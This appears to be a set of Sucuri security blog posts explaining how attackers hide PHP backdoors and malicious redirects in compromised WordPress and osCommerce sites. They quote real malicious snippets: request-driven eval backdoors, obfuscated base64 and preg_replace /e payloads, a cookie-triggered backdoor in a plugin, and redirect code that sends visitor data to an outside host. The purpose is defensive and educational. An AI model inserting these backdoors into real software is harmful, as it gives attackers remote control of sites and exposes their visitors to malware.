Protect Your Interwebs!
We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users. The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?
It could be outside the root directory of your site. On many sites we’ve been analyzing over the last few days, they’ve been adding the following code in wp-config.php (yes, WordPress sites on shared hosts):
require( ABSPATH . “/../etc/mailquota”);
Have you ever tried to visit your site and you got redirected to a different site? Maybe some external news page that had nothing to do with your site? Then have you tried to visit it again to test and it worked properly?
Over the last few days we’ve been getting this question often and it means that your site has been hacked and compromised. Basically the attackers added a code similar to this to your site:
$url = “http://moneygram-tracking.com/cabl/ws/12/request.php?ip=”.$_SERVER['REMOTE_ADDR'].”&useragent=”.urlencode($_SERVER['HTTP_USER_AGENT']).”&referer=”.urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
if (strpos($answer,”noredirect”) === false) {
echo $answer;
}
If you have any question about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “ask sucuri” answers, go here.
When a site gets compromised, one thing we know for sure is that the attackers will leave some piece of malware in there to allow them access back to the site. We call this type of malware, backdoors.
Backdoors are very hard to find because they don’t have to be linked anywhere in the site, they can be very small and be easily confused with “normal” code. Some of them have passwords, some are heavily encrypted/encoded and can be anywhere in your site.
On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that’s likely not to find everything (and your site will just get reinfected).
For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:
if (isset($_REQUEST[\'asc\'])) eval(stripslashes($_REQUEST[\'asc\']));
Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.
What about this one:
wp__theme_icon=create_function(”,file_get_contents(‘/path/wp-content/themes/themename/images/void.jpg’));$wp__theme_icon();
What you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean, by being hard to detect and search for?
Since backdoors can be in any type or shape, let’s look at some examples:
The “Filesman” backdoor, big, complex and easy to find:
$auth_pass = “63a9f0ea7bb98050796b649e85481845″;
$color = “#df5″;
$default_action = “SQL”;
$default_charset = “Windows-1251″;
$protectionoffer = “ficken”;
preg_replace(“/.*/e”,”\x65\x76\x61\x6C\.. hundreds more lines..
Another simple backdoor, executing any code from the “php” request:
eval (base64_decode($_POST["php"]));
A WordPress-based backdoor. This time, the bad content is hidden inside the database (wp-options tables)
return @eval(get_option(\’blogopt1\’));
A messy backdoor we are seeing in the latest timthumb.php attacks. On this case, all the variables are completely random per case and per file:
>function aknhtkmml3($ur5){$dtuq=’$u’;$pnt=’e6′;$p5zy=’r';$xcl4=’e(‘;$feuh=’od’;$qjka=’dec’;$rhi=’$u’;
$m=’as’;$xcew=’);’;$iw=’_';$jutx=’5=b’;$fwiw=’4′;$zqi=’r';$pwrb=’5′;
eval($rhi.$p5zy.$jutx.$m.$pnt.$fwiw.$iw.$qjka.$feuh.$xcl4.$dtuq.$zqi.$pwrb…
return $ur5;}$sk25=’M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…
Another messy one. Do you know how the code is executed there? Preg_replace with the “e” modifier actually acts like an “eval”:
>$lllllll=’lllllllll’;
$llllll=”/^.*$/e”;
$llllllll=’ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack(‘H*’, ’406576616c286261736536345f6465636f646528′).’\$llllllll))’;
preg_replace($llllll, $lllllllll, $lllllll);
Searching for base64_decode? Well, what happens when the attackers do this:
<?php $XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb
=’b’.$XZKsyG.$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY…
And those are just some simple examples…
Finding them is very hard, but inside Sucuri we were able to come up with some techniques that work very well:
So we mix white listing + blacklisting and our own manual analysis to find all the backdoors in a site. If you are trying to clean a compromised site by your self, we recommend first overwriting all the files you can (core files, plugins, etc). Of what is left, you have to analyse manually to make sure it is clean…
What do you think? I would love to hear other ideas to identify backdoors that you guys are using.
If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That lead to WordPress.org resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the WP.org team did a amazing job dealing with this incident and getting it all fixed very fast!
However, what is interesting to us is what the WordPress.org team said:
Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.
Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:
if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))
$this->desired_view = $matches[1].$matches[2];
Someone skimming through the code may not see anything with malicious intent there. However, it checks if a specific COOKIE is set, and if it is, it parses the content into the $matches variable. After that, it executes the code by calling ($matches[1]($matches[2])) ). That is possible because variable names can be called as functions in PHP (so matches1 is the name, and matches2 the argument of the function).
So someone could set the cookie to eval, or even system/exec, and run any command on the target site as the web server user.
Again, very clever backdoor and I am impressed that the WordPress team caught this in the middle of so many plugins and commits. I wasn’t able to check the other plugins, because it seems that plugins.trac.wordpress.org is down at the moment.
Another thing to highlight, which Matt stated in the news release on WordPress.org, is make sure you update your plugins. By making sure your software is up to date, you have the latest patches and security fixes which in turn lowers your risk of security issues.
If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.
Receive new posts in your inbox.
Copyright © 2013 Sucuri Inc. · Terms of Service · Privacy Policy
Sucuri® is a registered trademark of Sucuri Inc. in the United States and/or other countries.
Comments